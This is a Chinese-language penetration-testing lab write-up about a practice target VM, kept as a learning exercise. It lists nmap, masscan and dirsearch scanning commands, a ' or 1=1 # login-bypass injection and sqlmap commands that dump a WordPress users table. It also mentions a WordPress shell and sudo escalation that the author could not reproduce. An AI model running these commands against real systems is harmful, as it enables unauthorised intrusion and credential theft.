赞
踩
该靶机 安装在VM上 无法启动
故将靶机安装在 Virtualbox 上 网卡 配置桥接win10网卡 192.168.1.100
攻击机 kali 在VMware上 也配置上桥接win10网卡 192.168.1.105
攻击机 win10 192.168.1.103
netdiscover -i eth1 -r 192.168.1.0/24
masscan -p 1-65525 --rate=1000 192.168.1.100
nmap -sC -sV -A -p 80 192.168.1.100 -o port.txt
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
OS details: Linux 3.2 - 4.9
(后来 从80端口 无法获取到shell后 查看 别人的解题思路,才发现 原来是从8080端口的wordpress获取的,但我下载的这个靶机,8080端口,443端口 都 没有起来,看后边也比较简单 就是利用wordpress 的cms 漏洞 获取shell 然后直接 sudo su 密码 也为wordpress 后台登录密码)
(1)访问主页。点击各个功能点 进行测试。查看源码
(2)枚举目录,点开测试 可用扫描器 或手工。看是否是cms等。
(1)使用 dirsearch 爆破
python3 dirsearch.py -u "http://192.168.1.100" -e "*"
爆破出 login.php /phpmyadmin
(2) 访问 login.php
一处登录框,尝试sql注入、 暴力破解 xss 等漏洞。
123 123 返回0
’ or 1=1 # 123 返回1
说明 万能密码登录成功,存在sql注入
sqlmap -r sql.txt --level 3 --batch --dbs
存在时间盲注 以及 其他库名
sqlmap -r sql.txt --batch --level 3 -D wordpress8080 -T users -C password,username --dump
( 从80端口 无法获取到shell后 查看 别人的解题思路,才发现 原来是从8080端口的wordpress获取的,但我下载的这个靶机,8080端口,443端口 都 没有起来,看后边也比较简单 就是利用wordpress 的cms 漏洞 获取shell 然后直接 sudo su 密码 也为wordpress 后台登录密码)
该靶场比较简单 sql注入 爆出 另一个web服务 wordpress的 账号密码,登录后台后 利用已知的cms漏洞获取shell。 sudo su 提权时 密码用 wordpress 后台密码尝试后 正确。
配置靶场时 出现只启动了 80端口,nmap 只能扫出80,telnet 8080 也不通 。 因靶场也比较简单 就 没有在尝试了。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。